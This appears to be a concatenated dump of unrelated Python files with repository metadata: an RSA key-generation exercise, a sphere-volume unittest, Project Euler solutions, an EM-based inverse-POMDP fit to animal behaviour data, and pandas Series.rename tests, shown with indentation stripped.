x0, x1, y0, y1 = 1, 0, 0, 1
while a != 0:
q, b, a = b // a, a, b % a
x0, x1 = x1, x0 - q * x1
y0, y1 = y1, y0 - q * y1
return b, y0, x0
# 當指令直接呼叫Rsa_generate.py時執行main
def main():
#從指令得指定的bits大小
cmd_list = sys.argv[1:]
bits = int(cmd_list[0])
#以bits大小來給定pq值
p = generate_primes(n=bits, k=1)[0]
q = generate_primes(n=bits, k=1)[0]
#計算n和phi_n
n = p * q
phi_n = (p - 1) * (q - 1)
#隨機找e且與phi_n-1互值並計算d
while True:
e = random.randrange(1, phi_n-1)
if math.gcd(e, phi_n) == 1:
#計算d: 利用擴展歐幾里得算法找e的反元素
gcd, s, t = EEA(phi_n, e)
if gcd == (s*phi_n + t*e):
d = t % phi_n
break
print('\np= ',p)
print('\nq= ',q)
print('\nn= ',n)
print('\ne= ',e)
print('\nd= ',d)
if __name__ == '__main__':
main() | [
"smallrespect33@gmail.com"
] | smallrespect33@gmail.com |
2d8e282e4ff5217cf1139f3a412e41342844571a | 278a000f8b40476b5d1473cc1b98d5872551cab2 | /test_sphere_volume.py | cb30c89536569a7350adecec0fb65901984d43cd | [] | no_license | Kaliumerbol/kaliev_erbol_hw_2.6 | 172eb765a9cd5be8f8a9dc4f28e3fc258e5d92d9 | 5ea5fa98baf10d467a287da435f40e796c2594c3 | refs/heads/main | 2023-06-05T15:44:51.723761 | 2021-06-29T10:51:01 | 2021-06-29T10:51:01 | 381,329,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | import unittest
import math
from sphere_volume import calculate_sphere_volume
pi = math.pi
class TestSphereVolume(unittest.TestCase):
def test_area(self):
self.assertAlmostEqual(calculate_sphere_volume(5), 4/3*pi*5**3)
self.assertAlmostEqual(calculate_sphere_volume(3.7), 4/3*pi*3.7**3)
self.assertAlmostEqual(calculate_sphere_volume(1), 4/3*pi)
# толком не понял как работает АсертРейсес, в нете долго копалсяя но внятного объяснения нет. что и как вылавливать не понятно, значения не описаны. Поэтому закоментил. А так все работает норм.
# self.assertRaises(ValueError, calculate_sphere, 'four')
def test_negative(self):
self.assertEqual(calculate_sphere_volume(-5), 'Радиус сферы не может быть отрицательным')
unittest.main() | [
"you@example.com"
] | you@example.com |
dbc3109026886a765f36a35503e96aecea7ce691 | 6dd9c1861878c3d2b173465f690a156c141dcfe9 | /Problem13.py | af15f94f1f7e8c46845bafa78862fd49c24ea873 | [] | no_license | MGasiewski/Euler | d57bf33a5f22ff7ee0d626da561259e69d2c9437 | 7bb922545d6c32b2dc203637b7c496e73f4460c0 | refs/heads/master | 2021-05-05T02:29:51.184887 | 2018-02-01T03:15:00 | 2018-02-01T03:15:00 | 119,776,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,230 | py | number_string = '''37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690'''
number_lines = number_string.splitlines()
numbers = [int(x[:11]) for x in number_lines]
print(sum(numbers)) | [
"mattgasiewski@outlook.com"
] | mattgasiewski@outlook.com |
40e3e58fd9f5481541e28e7409d81d114f2d8598 | 783f4a386cc2e1dd434642835d5fe0ea8d21c305 | /neural_data_analysis.py | 67e37ddaf4e923097d553bfc34ef8a1d79a2892e | [] | no_license | wenshuowang/inverse-POMDP | 83b21af10e3f276715646c14ec1853bdebdd7ef4 | 596709441a80b9f4685b1b575cd6a5d89eee04c6 | refs/heads/master | 2022-12-22T03:26:57.467651 | 2020-09-27T04:45:23 | 2020-09-27T04:45:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,250 | py | from scipy.io import loadmat
import numpy as np
import matplotlib.pyplot as plt
import hdf5storage
from twobox import *
from HMMtwobox import *
import pickle
from datetime import datetime
import os
from pprint import pprint
path = os.getcwd()
datestring = datetime.strftime(datetime.now(), '%m%d%Y(%H%M)')
###########################################################
#
# Pre-process data
#
###########################################################
data = loadmat('NeuralDatafromNeda/behavior74.mat')
location = np.copy(data['bLocX74'][0])
# fill nan with the average of the previous and the next
nanind = np.where(np.isnan(location))[0]
location[nanind] = (location[nanind - 1] + location[nanind + 1]) / 2
# there might be two adjacent nans
nanind1 = np.where(np.isnan(location))[0][::2]
nanind2 = np.where(np.isnan(location))[0][1::2]
location[nanind1] = (location[nanind1 - 1] + location[nanind1 + 2]) / 2
location[nanind2] = location[nanind1]
def movingaverage(interval, window_size):
window= np.ones(int(window_size))/float(window_size)
return np.convolve(interval, window, 'same')
# smooothing the location
location = movingaverage(location, 5)
# adjust the value of the outliers
location[np.where(location < 350)[0]] = 1
location[np.where(location > 450)[0]] = 2
location[np.all([location >= 350, location <= 450], axis=0)] = 0
g0 = 1 # g0 = go to location 0
g1 = 2 # g1 = go toward box 1 (via location 0 if from 2)
g2 = 3 # g2 = go toward box 2 (via location 0 if from 1)
loc_change_ind = np.where((location[0:-1] - location[1:])!= 0)[0]
goaction = np.zeros(len(location))
for i in range(len(loc_change_ind)):
if location[loc_change_ind[i]] == 0: # at center location
if location[loc_change_ind[i] + 1] == 1: # go towards box 1
goaction[loc_change_ind[i]] = g1
else: # go towards box 2
goaction[loc_change_ind[i]] = g2
elif location[loc_change_ind[i]] == 1: # at box1
if location[loc_change_ind[i] + 1] == 0: # go towards box 0
goaction[loc_change_ind[i]] = g0
else: # go towards box 1
goaction[loc_change_ind[i]] = g2
else: # at box2
if location[loc_change_ind[i] + 1] == 0: # go towards box 0
goaction[loc_change_ind[i]] = g0
else: # go towards box 1
goaction[loc_change_ind[i]] = g1
b1Pushed = data['b1PushedTimes74'][0] // 200
b2Pushed = data['b2PushedTimes74'][0] // 200
rew1Del = data['rew1DelTimes74'][0] // 200
rew2Del = data['rew2DelTimes74'][0] // 200
pb = 4
action = np.copy(goaction)
for i in range(len(b1Pushed)):
action[b1Pushed[i]] = pb
for i in range(len(b2Pushed)):
action[b2Pushed[i]] = pb
rewardDel = np.zeros(len(location))
for i in range(len(rew1Del)):
rewardDel[rew1Del[i]] = 1
for i in range(len(rew2Del)):
rewardDel[rew2Del[i]] = 1
T = 15000
loc = location[0:T].astype(int)
act = action[0:T].astype(int)
rew = rewardDel[0:T].astype(int)
#######################
# add=hoc modification of the data
#######################
rew[1224] = 0
rew[1225] = 1
rew[2445] = 0
rew[2446] = 1
rew[3852] = 0
rew[3853] = 1
rew[3384] = 0
rew[11538] = 1
rew[11539] = 0
rew[12620] = 0
rew[13729] = 1
rew[13730] = 0
rew[13731] = 0
#######################
###########################################################
#
# EM algorithm
#
###########################################################
obsN = np.dstack([act, rew, loc])
obs = obsN[0]
E_MAX_ITER = 500 # 100 # maximum number of iterations of E-step
GD_THRESHOLD = 10 #0.5 # 0.01 # stopping criteria of M-step (gradient descent)
E_EPS = 0.5 # stopping criteria of E-step
#M_LR_INI = float(sys.argv[1])
M_LR_INI = 1 * 10 ** -6 # initial learning rate in the gradient descent step
LR_DEC = 4 # number of times that the learning rate can be reduced
SaveEvery = 50
# No need to manual interaction to specify parameters in the command line
#parameters = [gamma1, gamma2, epsilon1, epsilon2, groom, travelCost, pushButtonCost]
parameterMain_dict = {'E_MAX_ITER': E_MAX_ITER,
'GD_THRESHOLD': GD_THRESHOLD,
'E_EPS': E_EPS,
'M_LR_INI': M_LR_INI,
'LR_DEC': LR_DEC,
'SaveEvery': SaveEvery,
'ParaInitial': [np.array([0.2, 0.25, 0, 0, 0.2, 0.3, 0.5])]
# 'ParaInitial': [np.array(list(map(float, i.strip('[]').split(',')))) for i in sys.argv[3].strip('()').split('-')]
# Initial parameter is a set that contains arrays of parameters, here only consider one initial point
}
output1 = open(path + '/' + datestring + '_real_ParameterMain_twobox' + '.pkl', 'wb')
pickle.dump(parameterMain_dict, output1)
output1.close()
### Choose which sample is used for inference
sampleIndex = [0]
NN = len(sampleIndex)
### Set initial parameter point
parameters_iniSet = parameterMain_dict['ParaInitial']
discount = 0.99
nq = 5
nr = 2
nl = 3
na = 5
print("\nThe initial points for estimation are:", parameters_iniSet)
#### EM algorithm for parameter estimation
print("\nEM algorithm begins ...")
# NN denotes multiple data set, and MM denotes multiple initial points
# NN_MM_para_old_traj = []
# NN_MM_para_new_traj = []
# NN_MM_log_likelihoods_old = []
# NN_MM_log_likelihoods_new = []
# NN_MM_log_likelihoods_com_old = [] # old posterior, old parameters
# NN_MM_log_likelihoods_com_new = [] # old posterior, new parameters
# NN_MM_latent_entropies = []
for nn in range(NN):
print("\nFor the", sampleIndex[nn] + 1, "-th set of data:")
##############################################################
# Compute likelihood
obs = obsN[sampleIndex[nn], :, :]
MM = len(parameters_iniSet)
# MM_para_old_traj = []
# MM_para_new_traj = []
# MM_log_likelihoods_old = []
# MM_log_likelihoods_new = []
# MM_log_likelihoods_com_old = [] # old posterior, old parameters
# MM_log_likelihoods_com_new = [] # old posterior, new parameters
# MM_latent_entropies = []
for mm in range(MM):
parameters_old = np.copy(parameters_iniSet[mm])
print("\n######################################################\n",
mm + 1, "-th initial estimation:", parameters_old)
itermax = E_MAX_ITER #100 # iteration number for the EM algorithm
eps = E_EPS # Stopping criteria for E-step in EM algorithm
para_old_traj = []
para_new_traj = []
log_likelihoods_old = []
log_likelihoods_new = []
log_likelihoods_com_old = [] # old posterior, old parameters
log_likelihoods_com_new = [] # old posterior, new parameters
latent_entropies = []
count_E = 0
while True:
print("The", count_E + 1, "-th iteration of the EM(G) algorithm")
if count_E == 0:
parameters_old = np.copy(parameters_iniSet[mm])
else:
parameters_old = np.copy(parameters_new) # update parameters
para_old_traj.append(parameters_old)
########## E-step ##########
## Use old parameters to estimate posterior
#twoboxGra = twoboxMDPder(discount, nq, nr, na, nl, parameters_old, vinitial)
twoboxGra = twoboxMDPder(discount, nq, nr, na, nl, parameters_old)
ThA_old = twoboxGra.ThA
softpolicy_old = twoboxGra.softpolicy
pi = np.ones(nq * nq) / nq / nq
twoHMM = HMMtwobox(ThA_old, softpolicy_old, pi)
## Calculate likelihood of observed and complete date, and entropy of the latent sequence
complete_likelihood_old = twoHMM.computeQaux(obs, ThA_old, softpolicy_old)
latent_entropy = twoHMM.latent_entr(obs)
log_likelihood = complete_likelihood_old + latent_entropy
log_likelihoods_com_old.append(complete_likelihood_old)
latent_entropies.append(latent_entropy)
log_likelihoods_old.append(log_likelihood)
print(parameters_old)
print(complete_likelihood_old)
print(log_likelihood)
## Check convergence
if len(log_likelihoods_old) >= 2 and np.abs(log_likelihood - log_likelihoods_old[-2]) < eps:
print("EM has converged!")
break
########## M(G)-step ##########
M_thresh = GD_THRESHOLD
count_M = 0
vinitial = 0
para_new_traj.append([])
log_likelihoods_com_new.append([])
log_likelihoods_new.append([])
learnrate_ini = M_LR_INI * np.exp(- count_E // 20)
learnrate = learnrate_ini
# Start the gradient descent from the old parameters
parameters_new = np.copy(parameters_old)
complete_likelihood_new = complete_likelihood_old
log_likelihood = complete_likelihood_new + latent_entropy
para_new_traj[count_E].append(parameters_new)
log_likelihoods_com_new[count_E].append(complete_likelihood_new)
log_likelihoods_new[count_E].append(log_likelihood)
print("\nM-step")
print(parameters_new)
print(complete_likelihood_new)
print(log_likelihood)
while True:
# derivative_value = twoboxGra.dQauxdpara(obs, parameters_new, vinitial)
# # vinitial is value from previous iteration, this is for computational efficiency
# para_temp = parameters_new + learnrate * np.array(derivative_value[:-1])
# vinitial = derivative_value[-1] # value iteration starts with value from previous iteration
derivative_value = twoboxGra.dQauxdpara_sim(obs, parameters_new)
# vinitial is value from previous iteration, this is for computational efficiency
para_temp = parameters_new + learnrate * np.array(derivative_value)
## Check the ECDLL (old posterior, new parameters)
twobox_new = twoboxMDP(discount, nq, nr, na, nl, para_temp)
twobox_new.setupMDP()
twobox_new.solveMDP_sfm()
ThA_new = twobox_new.ThA
softpolicy_new = twobox_new.softpolicy
complete_likelihood_new_temp = twoHMM.computeQaux(obs, ThA_new, softpolicy_new)
print(" ", para_temp)
print(" ", complete_likelihood_new_temp)
## Update the parameter if the ECDLL can be improved
if complete_likelihood_new_temp > complete_likelihood_new + M_thresh:
parameters_new = np.copy(para_temp)
complete_likelihood_new = complete_likelihood_new_temp
log_likelihood = complete_likelihood_new + latent_entropy
para_new_traj[count_E].append(parameters_new)
log_likelihoods_com_new[count_E].append(complete_likelihood_new)
log_likelihoods_new[count_E].append(log_likelihood)
print('\n', parameters_new)
print(complete_likelihood_new)
print(log_likelihood)
count_M += 1
else:
learnrate /= 2
if learnrate < learnrate_ini / (2 ** LR_DEC):
break
# every 50 iterations, download data
if (count_E + 1) % SaveEvery == 0:
Experiment_dict = {'ParameterTrajectory_Estep': para_old_traj,
'ParameterTrajectory_Mstep': para_new_traj,
'LogLikelihood_Estep': log_likelihoods_old,
'LogLikelihood_Mstep': log_likelihoods_new,
'Complete_LogLikelihood_Estep': log_likelihoods_com_old,
'Complete_LogLikelihood_Mstep': log_likelihoods_com_new,
'Latent_entropies': latent_entropies
}
output = open(path + '/' + datestring + '_' + str(count_E + 1) + '_real_EM_twobox' + '.pkl', 'wb')
pickle.dump(Experiment_dict, output)
output.close()
count_E += 1
# save the remainings
Experiment_dict = {'ParameterTrajectory_Estep': para_old_traj,
'ParameterTrajectory_Mstep': para_new_traj,
'LogLikelihood_Estep': log_likelihoods_old,
'LogLikelihood_Mstep': log_likelihoods_new,
'Complete_LogLikelihood_Estep': log_likelihoods_com_old,
'Complete_LogLikelihood_Mstep': log_likelihoods_com_new,
'Latent_entropies': latent_entropies
}
output = open(path + '/' + datestring + '_' + str(count_E + 1) + '_real_EM_twobox' + '.pkl', 'wb')
pickle.dump(Experiment_dict, output)
output.close()
# MM_para_old_traj.append(para_old_traj) # parameter trajectories for a particular set of data
# MM_para_new_traj.append(para_new_traj)
# MM_log_likelihoods_old.append(log_likelihoods_old) # likelihood trajectories for a particular set of data
# MM_log_likelihoods_new.append(log_likelihoods_new)
# MM_log_likelihoods_com_old.append(log_likelihoods_com_old) # old posterior, old parameters
# MM_log_likelihoods_com_new.append(log_likelihoods_com_new) # old posterior, new parameters
# MM_latent_entropies.append(latent_entropies)
#
# NN_MM_para_old_traj.append(MM_para_old_traj) # parameter trajectories for all data
# NN_MM_para_new_traj.append(MM_para_new_traj)
# NN_MM_log_likelihoods_old.append(MM_log_likelihoods_old) # likelihood trajectories for
# NN_MM_log_likelihoods_new.append(MM_log_likelihoods_new)
# NN_MM_log_likelihoods_com_old.append(MM_log_likelihoods_com_old) # old posterior, old parameters
# NN_MM_log_likelihoods_com_new.append(MM_log_likelihoods_com_new) # old posterior, new parameters
# NN_MM_latent_entropies.append(MM_latent_entropies)
###########################################################
#
# save data
#
###########################################################
# ## save the running data
# Experiment_dict = {'ParameterTrajectory_Estep': NN_MM_para_old_traj,
# 'ParameterTrajectory_Mstep': NN_MM_para_new_traj,
# 'LogLikelihood_Estep': NN_MM_log_likelihoods_old,
# 'LogLikelihood_Mstep': NN_MM_log_likelihoods_new,
# 'Complete_LogLikelihood_Estep': NN_MM_log_likelihoods_com_old,
# 'Complete_LogLikelihood_Mstep': NN_MM_log_likelihoods_com_new,
# 'Latent_entropies': NN_MM_latent_entropies
# }
# output = open(path + '/' + datestring + '_real_EM_twobox' + '.pkl', 'wb')
# pickle.dump(Experiment_dict, output)
# output.close()
#
# ## save running parameters
# # parameterMain_dict = {'E_MAX_ITER': E_MAX_ITER,
# # 'GD_THRESHOLD': GD_THRESHOLD,
# # 'E_EPS': E_EPS,
# # 'M_LR_INI': M_LR_INI,
# # 'LR_DEC': LR_DEC,
# # 'ParaInitial': parameters_iniSet}
# output1 = open(path + '/' + datestring + '_real_ParameterMain_twobox' + '.pkl', 'wb')
# pickle.dump(parameterMain_dict, output1)
# output1.close()
print("finish")
# ###########################################################
# #
# # retrieve data and look into contour
# #
# ###########################################################
# EM_pkl_file = open(path + '/real_EM_twobox.pkl', 'rb')
# EM_pkl = pickle.load(EM_pkl_file)
# EM_pkl_file.close()
#
# ParameterMain_pkl_file = open(path + '/real_ParameterMain_twobox.pkl', 'rb')
# ParameterMain_pkl = pickle.load(ParameterMain_pkl_file)
# ParameterMain_pkl_file.close()
#
# NN_MM_para_old_traj = EM_pkl['ParameterTrajectory_Estep']
# NN_MM_para_new_traj = EM_pkl['ParameterTrajectory_Mstep']
# NN_MM_log_likelihoods_old = EM_pkl['LogLikelihood_Estep']
# NN_MM_log_likelihoods_new = EM_pkl['LogLikelihood_Mstep']
# NN_MM_log_likelihoods_com_old = EM_pkl['Complete_LogLikelihood_Estep']
# NN_MM_log_likelihoods_com_new = EM_pkl['Complete_LogLikelihood_Mstep']
# NN_MM_latent_entropies = EM_pkl['Latent_entropies']
#
# para_traj = [k for i in NN_MM_para_new_traj[0] for j in i for k in j]
# point = np.copy(para_traj)
#
#
#
# ###################################################################
# from sklearn.decomposition import PCA
# import matplotlib.pyplot as plt
# pca = PCA(n_components = 2)
# pca.fit(point - point[-1])
# projectionMat = pca.components_
# print(projectionMat)
#
# # Contour of the likelihood
# step1 = 0.04 # for u (1st principle component)
# step2 = 0.04 # for v (2nd principle component)
# N1 = 25
# N2 = 10
# uOffset = - step1 * N1 / 2
# vOffset = - step2 * N2 / 2
#
# uValue = np.zeros(N1)
# vValue = np.zeros(N2)
# Qaux1 = np.zeros((N2, N1)) # Likelihood with ground truth latent
# Qaux2 = np.zeros((N2, N1)) # Expected complete data likelihood
# Qaux3 = np.zeros((N2, N1)) # Entropy of latent posterior
# para_slice = []
#
# for i in range(N1):
# uValue[i] = step1 * (i) + uOffset
# for j in range(N2):
# vValue[j] = step2 * (j) + vOffset
#
# para_slicePoints = point[-1] + uValue[i] * projectionMat[0] + vValue[j] * projectionMat[1]
# para_slice.append(para_slicePoints)
# para = np.copy(para_slicePoints)
# # print(para)
#
# twobox = twoboxMDP(discount, nq, nr, na, nl, para)
# twobox.setupMDP()
# twobox.solveMDP_sfm()
# ThA = twobox.ThA
# policy = twobox.softpolicy
# pi = np.ones(nq * nq) / nq / nq # initialize the estimation of the belief state
# twoboxHMM = HMMtwobox(ThA, policy, pi)
#
# # Qaux1[j, i] = twoboxHMM.likelihood(lat, obs, ThA, policy) #given latent state
# Qaux2[j, i] = twoboxHMM.computeQaux(obs, ThA, policy)
# Qaux3[j, i] = twoboxHMM.latent_entr(obs)
#
# Loglikelihood = Qaux2 + Qaux3
#
#
# Contour_dict = {'uValue': uValue, 'vValue': vValue, 'Qaux2': Qaux2, 'Qaux3': Qaux3}
# output = open(path + '/' + datestring + '_real_contour' + '.pkl', 'wb')
# pickle.dump(Contour_dict, output)
# output.close()
#
# # project the trajectories onto the plane
# point_2d = projectionMat.dot((point - point[-1]).T).T
# # true parameters projected onto the plane
# #true_2d = projectionMat.dot(parameters - point[-1])
# fig, ax = plt.subplots(figsize = (10, 10))
# uValuemesh, vValuemesh = np.meshgrid(uValue, vValue)
# cs3 = plt.contour(uValuemesh, vValuemesh, Loglikelihood,
# np.arange(np.min(Loglikelihood), np.max(Loglikelihood), 5), cmap='jet')
# #plt.xticks(np.arange(0, 1, 0.1))
# #plt.yticks(np.arange(0, 1, 0.1))
# plt.plot(point_2d[:, 0], point_2d[:, 1], marker='.', color = 'b') # projected trajectories
# plt.plot(point_2d[-1, 0], point_2d[-1, 1], marker='*', color = 'g', markersize = 10) # final point
# #plt.plot(true_2d[0], true_2d[1], marker='o', color = 'g') # true
# ax.grid()
# ax.set_title('Likelihood of observed data')
# plt.xlabel(r'$u \mathbf{\theta}$', fontsize = 10)
# plt.ylabel(r'$v \mathbf{\theta}$', fontsize = 10)
# plt.clabel(cs3, inline=1, fontsize=10)
# plt.colorbar()
# plt.show()
#
# #################################################################
# showlen = 200
# showT = range(1000,1000+showlen)
# para_est = point[-1]
# twobox_est = twoboxMDP(discount, nq, nr, na, nl, para_est)
# twobox_est.setupMDP()
# twobox_est.solveMDP_sfm()
# ThA = twobox_est.ThA
# policy = twobox_est.softpolicy
# pi = np.ones(nq * nq)/ nq /nq # initialize the estimation of the belief state
# twoboxHMM_est = HMMtwobox(ThA, policy, pi)
#
# alpha_est, scale_est = twoboxHMM_est.forward_scale(obs)
# beta_est = twoboxHMM_est.backward_scale(obs, scale_est)
# gamma_est = twoboxHMM_est.compute_gamma(alpha_est, beta_est)
# xi_est = twoboxHMM_est.compute_xi(alpha_est, beta_est, obs)
#
# #lat_compound = nq * lat[:, 0] + lat[:, 1]
#
# fig, ax = plt.subplots(figsize= (20, 10))
# plt.imshow(gamma_est[:, showT], interpolation='Nearest', cmap='gray')
# #plt.plot(lat_compound[showT], color = 'r',marker ='.', markersize = 15)
# plt.xticks(np.arange(0, showlen, 10))
# plt.xlabel('time')
# plt.ylabel('belief state')
# plt.show()
#
# belief1_est = np.sum(np.reshape(gamma_est[:, showT].T, (showlen, nq, nq)), axis = 2)
# belief2_est = np.sum(np.reshape(gamma_est[:, showT].T, (showlen, nq, nq)), axis = 1)
#
# fig = plt.figure(figsize= (20, 4))
# ax1 = fig.add_subplot(211)
# ax1.imshow(belief1_est.T, interpolation='Nearest', cmap='gray')
# ax1.set(title = 'belief of box 1 based on estimated parameters')
# ax2 = fig.add_subplot(212)
# ax2.imshow(belief2_est.T, interpolation='Nearest', cmap='gray')
# ax2.set(title = 'belief of box 2 based on estimated parameters')
# plt.show()
print('hello')
| [
"zhengwei@zhengweis-mbp.ad.bcm.edu"
] | zhengwei@zhengweis-mbp.ad.bcm.edu |
924fcb51f482e997c837a79f2363ad5b113136aa | 03195a6f98396fd27aedc3c06d81f1553fb1d16b | /pandas/tests/series/methods/test_rename.py | 90c8f775586e6d8a3b4fbc61dfc9c8334d7b3417 | [
"BSD-3-Clause"
] | permissive | huaxz1986/pandas | a08d80d27726fe141d449835b9a09265bca5b5e0 | ba2473834fedcf571d3f8245b4b24796873f2736 | refs/heads/master | 2023-06-11T02:20:14.544220 | 2022-01-12T04:40:06 | 2022-01-12T04:40:06 | 131,370,494 | 3 | 4 | BSD-3-Clause | 2018-04-28T03:51:05 | 2018-04-28T03:51:05 | null | UTF-8 | Python | false | false | 4,450 | py | from datetime import datetime
import numpy as np
import pytest
from pandas import (
Index,
MultiIndex,
Series,
)
import pandas._testing as tm
class TestRename:
def test_rename(self, datetime_series):
ts = datetime_series
renamer = lambda x: x.strftime("%Y%m%d")
renamed = ts.rename(renamer)
assert renamed.index[0] == renamer(ts.index[0])
# dict
rename_dict = dict(zip(ts.index, renamed.index))
renamed2 = ts.rename(rename_dict)
tm.assert_series_equal(renamed, renamed2)
def test_rename_partial_dict(self):
# partial dict
ser = Series(np.arange(4), index=["a", "b", "c", "d"], dtype="int64")
renamed = ser.rename({"b": "foo", "d": "bar"})
tm.assert_index_equal(renamed.index, Index(["a", "foo", "c", "bar"]))
def test_rename_retain_index_name(self):
# index with name
renamer = Series(
np.arange(4), index=Index(["a", "b", "c", "d"], name="name"), dtype="int64"
)
renamed = renamer.rename({})
assert renamed.index.name == renamer.index.name
def test_rename_by_series(self):
ser = Series(range(5), name="foo")
renamer = Series({1: 10, 2: 20})
result = ser.rename(renamer)
expected = Series(range(5), index=[0, 10, 20, 3, 4], name="foo")
tm.assert_series_equal(result, expected)
def test_rename_set_name(self):
ser = Series(range(4), index=list("abcd"))
for name in ["foo", 123, 123.0, datetime(2001, 11, 11), ("foo",)]:
result = ser.rename(name)
assert result.name == name
tm.assert_numpy_array_equal(result.index.values, ser.index.values)
assert ser.name is None
def test_rename_set_name_inplace(self):
ser = Series(range(3), index=list("abc"))
for name in ["foo", 123, 123.0, datetime(2001, 11, 11), ("foo",)]:
ser.rename(name, inplace=True)
assert ser.name == name
exp = np.array(["a", "b", "c"], dtype=np.object_)
tm.assert_numpy_array_equal(ser.index.values, exp)
def test_rename_axis_supported(self):
# Supporting axis for compatibility, detailed in GH-18589
ser = Series(range(5))
ser.rename({}, axis=0)
ser.rename({}, axis="index")
with pytest.raises(ValueError, match="No axis named 5"):
ser.rename({}, axis=5)
def test_rename_inplace(self, datetime_series):
renamer = lambda x: x.strftime("%Y%m%d")
expected = renamer(datetime_series.index[0])
datetime_series.rename(renamer, inplace=True)
assert datetime_series.index[0] == expected
def test_rename_with_custom_indexer(self):
# GH 27814
class MyIndexer:
pass
ix = MyIndexer()
ser = Series([1, 2, 3]).rename(ix)
assert ser.name is ix
def test_rename_with_custom_indexer_inplace(self):
# GH 27814
class MyIndexer:
pass
ix = MyIndexer()
ser = Series([1, 2, 3])
ser.rename(ix, inplace=True)
assert ser.name is ix
def test_rename_callable(self):
# GH 17407
ser = Series(range(1, 6), index=Index(range(2, 7), name="IntIndex"))
result = ser.rename(str)
expected = ser.rename(lambda i: str(i))
tm.assert_series_equal(result, expected)
assert result.name == expected.name
def test_rename_none(self):
# GH 40977
ser = Series([1, 2], name="foo")
result = ser.rename(None)
expected = Series([1, 2])
tm.assert_series_equal(result, expected)
def test_rename_series_with_multiindex(self):
# issue #43659
arrays = [
["bar", "baz", "baz", "foo", "qux"],
["one", "one", "two", "two", "one"],
]
index = MultiIndex.from_arrays(arrays, names=["first", "second"])
ser = Series(np.ones(5), index=index)
result = ser.rename(index={"one": "yes"}, level="second", errors="raise")
arrays_expected = [
["bar", "baz", "baz", "foo", "qux"],
["yes", "yes", "two", "two", "yes"],
]
index_expected = MultiIndex.from_arrays(
arrays_expected, names=["first", "second"]
)
series_expected = Series(np.ones(5), index=index_expected)
tm.assert_series_equal(result, series_expected)
| [
"noreply@github.com"
] | noreply@github.com |
47d50974bddd183974be8f3a97f8d1eee628a000 | f34a29924278ea5beb415055fb25401e6f61afdc | /Problem 008.py | 5fb6a8f6a12a6dc54367ba0146e1b3cb896209a5 | [] | no_license | NathanLHall/Project-Euler | c860614b85bd7edf53db366bdedf763b3b4950dd | 5f26c0fdacbcc9fcbc637ab84fd34202169912ff | refs/heads/master | 2021-05-12T07:46:34.065900 | 2019-05-15T02:12:07 | 2019-05-15T02:12:07 | 117,257,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 12:06:57 2018
@author: NathanLHall
"""
adjacencyLength = 13
file = open("Problem 008.txt", 'r')
contents = file.readlines()
file.close()
number = []
maxProduct = 1
for line in contents:
for i in line:
if i != '\n':
number.append(int(i))
for i in range(len(number) - (adjacencyLength - 1)):
searchSpace = []
product = 1
